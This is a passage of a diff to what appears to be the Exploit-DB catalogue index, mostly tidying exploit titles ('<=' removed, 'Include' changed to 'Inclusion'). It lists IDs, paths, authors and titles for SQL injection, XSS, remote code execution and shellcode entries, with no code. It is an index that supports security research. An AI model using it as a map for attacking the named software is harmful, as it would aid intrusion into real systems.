Injection",2011-08-01,noptrix,multiple,remote,0 +36003,platforms/php/webapps/36003.txt,"Curverider Elgg 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 +36004,platforms/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' Field HTML Injection",2011-08-01,noptrix,multiple,remote,0 36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",multiple,remote,0 36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0 @@ -32481,15 +32481,15 @@ id,file,description,date,author,platform,type,port 36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange 'referer_id' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 -36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 +36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 NULL Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",hardware,webapps,0 36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,Metasploit,php,webapps,80 -36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include",2011-08-11,"RiRes Walid",php,webapps,0 +36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps,0 36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 36046,platforms/php/webapps/36046.txt,"phpWebSite 'page_id' Parameter Cross Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 -36047,platforms/php/webapps/36047.txt,"awiki 20100125 Multiple Local File Include Vulnerabilities",2011-08-15,muuratsalo,php,webapps,0 +36047,platforms/php/webapps/36047.txt,"awiki 20100125 Multiple Local File Inclusion Vulnerabilities",2011-08-15,muuratsalo,php,webapps,0 36048,platforms/php/webapps/36048.txt,"PHPList 2.10.x Security Bypass and Information Disclosure Vulnerabilities",2011-08-15,"Davide Canali",php,webapps,0 36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite",2011-08-17,"High-Tech Bridge SA",windows,remote,0 36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps,0 @@ -32508,7 +32508,7 @@ id,file,description,date,author,platform,type,port 36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu 'main.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps,0 36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionaire SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross Site Scripting",2011-08-18,G.R0b1n,cfm,webapps,0 -36068,platforms/php/webapps/36068.txt,"MantisBT <= 1.1.8 Cross Site Scripting and SQL Injection Vulnerabilities",2011-08-18,Net.Edit0r,php,webapps,0 +36068,platforms/php/webapps/36068.txt,"MantisBT 1.1.8 Cross Site Scripting and SQL Injection Vulnerabilities",2011-08-18,Net.Edit0r,php,webapps,0 36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 Remote Buffer Overflow",2011-08-19,KedAns-Dz,windows,dos,0 36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross Site Scripting",2011-08-21,mr.pr0n,php,webapps,0 36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x - 'index.php' Cross Site Scripting",2011-08-22,"mehdi boukazoula",php,webapps,0 @@ -32523,15 +32523,15 @@ id,file,description,date,author,platform,type,port 36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'filemanager/controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 -36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 +36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS",2015-02-16,"Kacper Szurek",php,webapps,0 36087,platforms/php/webapps/36087.txt,"Fancybox for WordPress 3.0.2 - Stored XSS",2015-02-16,NULLpOint7r,php,webapps,0 36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80 36090,platforms/php/webapps/36090.txt,"ClickCMS Denial of Service and CAPTCHA Bypass",2011-08-29,MustLive,php,webapps,0 36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0 -36092,platforms/windows/dos/36092.pl,"MapServer <= 6.0 Map File Double Free Remote Denial of Service",2011-08-30,rouault,windows,dos,0 +36092,platforms/windows/dos/36092.pl,"MapServer 6.0 Map File Double Free Remote Denial of Service",2011-08-30,rouault,windows,dos,0 36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection",2011-08-30,Net.Edit0r,php,webapps,0 -36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 Local File Include and SQL Injection Vulnerabilities",2011-08-31,KedAns-Dz,php,webapps,0 +36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 Local File Inclusion and SQL Injection Vulnerabilities",2011-08-31,KedAns-Dz,php,webapps,0 36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur Cross Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 @@ -32561,8 +32561,8 @@ id,file,description,date,author,platform,type,port 36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' Parameter SQL Injection",2011-09-08,SubhashDasyam,php,webapps,0 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 -36128,platforms/windows/dos/36128.txt,"Wireshark <= 1.6.1 - Malformed Packet Trace File Remote Denial of Service",2011-09-08,Wireshark,windows,dos,0 -36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 +36128,platforms/windows/dos/36128.txt,"Wireshark 1.6.1 - Malformed Packet Trace File Remote Denial of Service",2011-09-08,Wireshark,windows,dos,0 +36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Inclusion and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection",2011-09-09,"David Mas",multiple,remote,0 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps,0 @@ -32570,8 +32570,8 @@ id,file,description,date,author,platform,type,port 36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0 36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 - 'wpa_id' Parameter SQL Injection",2011-09-14,sherl0ck_,php,webapps,0 -36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Include",2011-09-15,KedAns-Dz,php,webapps,0 -36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 +36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Inclusion",2011-09-15,KedAns-Dz,php,webapps,0 +36137,platforms/php/webapps/36137.txt,"PunBB 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0 36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products - Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0 36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 @@ -32596,14 +32596,14 @@ id,file,description,date,author,platform,type,port 36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - CSRF",2015-02-23,"Eric Flokstra",php,webapps,80 -36162,platforms/php/webapps/36162.txt,"TWiki <= 5.0.2 bin/view/Main/Jump newtopic Parameter XSS",2011-09-22,"Mesut Timur",php,webapps,0 -36163,platforms/php/webapps/36163.txt,"TWiki <= 5.0.2 SlideShowPlugin Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0 +36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 bin/view/Main/Jump newtopic Parameter XSS",2011-09-22,"Mesut Timur",php,webapps,0 +36163,platforms/php/webapps/36163.txt,"TWiki 5.0.2 SlideShowPlugin Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0 36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10_ WordPress 3.1.x_ DEV Blogs Mu 1.2.6 Regular Subscriber - HTML Injection",2011-09-26,knull,php,webapps,0 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-09-26,"Stefan Schurtz",php,webapps,0 -36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin <= 3.23 - 'serendipity[tagview]' Cross Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 -36170,platforms/php/webapps/36170.txt,"PunBB <= 1.3.6 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0 +36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 +36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0 36171,platforms/php/webapps/36171.txt,"Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 36173,platforms/php/webapps/36173.txt,"Vanira CMS 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0 @@ -32635,7 +32635,7 @@ id,file,description,date,author,platform,type,port 36199,platforms/linux/remote/36199.txt,"Perl 5.x Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,linux,remote,0 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 -36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution (0Day)",2015-03-01,"OJ Reeves",hardware,webapps,80 +36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution (0Day)",2015-03-01,"OJ Reeves",hardware,webapps,80 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 @@ -32651,21 +32651,21 @@ id,file,description,date,author,platform,type,port 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,"cr4wl3r ",php,webapps,0 36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 -36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 Multiple Remote File Include Vulnerabilities",2011-10-10,indoushka,php,webapps,0 +36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 Multiple Remote File Inclusion Vulnerabilities",2011-10-10,indoushka,php,webapps,0 36217,platforms/windows/remote/36217.txt,"GoAhead Webserver 2.18 addgroup.asp group Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 36218,platforms/windows/remote/36218.txt,"GoAhead Webserver 2.18 addlimit.asp url Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 36219,platforms/windows/remote/36219.txt,"GoAhead Webserver 2.18 adduser.asp Multiple Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 36220,platforms/php/webapps/36220.txt,"Joomla! 'com_tree' Component 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36221,platforms/php/webapps/36221.txt,"Joomla! 'com_br' Component 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36222,platforms/php/webapps/36222.txt,"Joomla! 'com_shop' Component 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 -36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Include Vulnerabilities",2011-10-11,indoushka,php,webapps,0 -36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 +36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion Vulnerabilities",2011-10-11,indoushka,php,webapps,0 +36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross Site Scripting And Information Disclosure Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 36225,platforms/php/webapps/36225.txt,"Contao CMS 2.10.1 Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0 36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0 36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0 -36230,platforms/php/webapps/36230.txt,"Calculated Fields Form WordPress Plugin <= 1.0.10 - Remote SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0 +36230,platforms/php/webapps/36230.txt,"Calculated Fields Form WordPress Plugin 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0 36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Shell Upload",2015-02-28,R-73eN,php,webapps,0 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 - Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 @@ -32678,16 +32678,16 @@ id,file,description,date,author,platform,type,port 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 36242,platforms/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection & XSS",2015-03-03,ayastar,php,webapps,0 -36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar <= 1.1.4 - SQL Injection vulnerabilities",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 -36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 -36247,platforms/multiple/dos/36247.txt,"Splunk <= 4.1.6 Web component Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 +36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar 1.1.4 - SQL Injection vulnerabilities",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 +36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 'segment' Parameter Cross Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 +36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web component Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 36248,platforms/php/webapps/36248.txt,"osCommerce Remote File Upload and File Disclosure Vulnerabilities",2011-10-20,indoushka,php,webapps,0 36249,platforms/php/webapps/36249.txt,"Tine 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0 36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote,0 36251,platforms/php/webapps/36251.txt,"PHPMoAdmin Unauthorized Remote Code Execution (0-Day)",2015-03-03,@u0x,php,webapps,80 36252,platforms/php/webapps/36252.txt,"e107 0.7.24 - 'cmd' Parameter Remote Command Execution",2011-10-24,"Matt Bergin",php,webapps,0 36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0 -36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 Multiple Local File Include Vulnerabilities",2011-10-25,"Null H4ck3r",php,webapps,0 +36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 Multiple Local File Inclusion Vulnerabilities",2011-10-25,"Null H4ck3r",php,webapps,0 36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Cross Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 - Local Privilege Escalation",2011-10-26,"Buguroo Offensive Security",linux,local,0 @@ -32696,14 +32696,14 @@ id,file,description,date,author,platform,type,port 36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",windows,dos,0 36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,Metasploit,php,remote,80 36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 -36266,platforms/lin_x86-64/dos/36266.c,"Linux Kernel <= 3.17.5 - IRET Instruction #SS Fault Handling Crash PoC",2015-03-04,"Emeric Nasi",lin_x86-64,dos,0 -36267,platforms/linux/dos/36267.c,"Linux Kernel <= 3.15.6 - PPP-over-L2TP Socket Level Handling Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 -36268,platforms/linux/dos/36268.c,"Linux Kernel <= 3.16.3 - Associative Array Garbage Collection Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 +36266,platforms/lin_x86-64/dos/36266.c,"Linux Kernel 3.17.5 - IRET Instruction #SS Fault Handling Crash PoC",2015-03-04,"Emeric Nasi",lin_x86-64,dos,0 +36267,platforms/linux/dos/36267.c,"Linux Kernel 3.15.6 - PPP-over-L2TP Socket Level Handling Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 +36268,platforms/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross Site Scripting",2011-10-28,"599eme Man",php,webapps,0 -36271,platforms/osx/dos/36271.py,"Apple Mac OS X <= 10.6.5 And iOS <= 4.3.3 Mail Denial of Service",2011-10-29,shebang42,osx,dos,0 +36271,platforms/osx/dos/36271.py,"Apple Mac OS X 10.6.5 And iOS 4.3.3 Mail Denial of Service",2011-10-29,shebang42,osx,dos,0 36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 -36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Include Vulnerabilities",2011-11-01,indoushka,php,webapps,0 +36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Inclusion Vulnerabilities",2011-11-01,indoushka,php,webapps,0 36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS - (Little Endian) Chmod 666 /etc/shadow shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 @@ -32711,8 +32711,8 @@ id,file,description,date,author,platform,type,port 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 36282,platforms/php/webapps/36282.txt,"eFront 3.6.x Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-11-02,"High-Tech Bridge SA",php,webapps,0 36283,platforms/php/webapps/36283.txt,"Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 -36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0 -36281,platforms/php/webapps/36281.txt,"Symphony <= 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 +36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0 +36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 36284,platforms/asp/webapps/36284.txt,"CmyDocument Multiple Cross Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 36285,platforms/windows/dos/36285.c,"Microsoft Windows TCP/IP Stack Reference Counter Integer Overflow",2011-11-08,anonymous,windows,dos,0 36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 @@ -32723,12 +32723,12 @@ id,file,description,date,author,platform,type,port 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal",2011-11-07,Buherátor,java,webapps,0 36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 - 'command_name' Parameter Remote Command Execution",2011-11-04,"Christophe de la Fuente",php,webapps,0 -36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0 +36294,platforms/linux/local/36294.c,"Linux Kernel 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0 36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection",2011-11-08,Kalashinkov3,php,webapps,0 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Local Privilege Escalation",2011-11-09,IKCE,bsd,local,0 36297,platforms/php/webapps/36297.txt,"AShop Open-Redirection and Cross Site Scripting Vulnerabilities",2011-11-09,"Infoserve Security Team",php,webapps,0 36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 -36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI <= 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 +36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 @@ -32741,8 +32741,8 @@ id,file,description,date,author,platform,type,port 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer Linux Kernel - Privilege Escalation 